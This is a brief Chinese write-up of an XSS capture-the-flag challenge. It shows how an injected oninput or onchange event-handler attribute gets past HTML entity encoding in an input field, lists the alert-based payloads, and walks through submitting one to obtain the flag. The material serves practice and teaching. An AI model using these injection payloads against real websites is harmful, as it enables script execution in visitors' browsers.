知识点:
倘若是在script、input标签当中,即可突破。
Payload
‘ οninput=alert`1` // 当要在input中输入内容时触发事件
‘ οninput=alert`1` ‘ 同上
‘ οnchange=alert`1` // 发生改变的时候触发该事件
‘ οnchange=alert`1` ‘ 同上
在script里直接alert
示例:
首选输入测试语句<script>alert(/Micr067/)</script>,
查看源码发现做了实体编码。
xss实体绕过示例
使用xss实体绕过即可突破,
先输入 ‘ οninput=alert`1` // 提交,
在input中输入内容时触发事件,输入数字1即触发xss弹窗,
获得flag{Network_security_Era}
xss实体绕过示例

相关文章:

  • 2022-12-23
  • 2021-09-22
  • 2021-05-25
  • 2022-01-07
  • 2021-06-21
  • 2021-04-03
  • 2021-10-21
猜你喜欢
  • 2022-01-22
  • 2022-01-23
  • 2022-12-23
  • 2021-12-07
相关资源
相似解决方案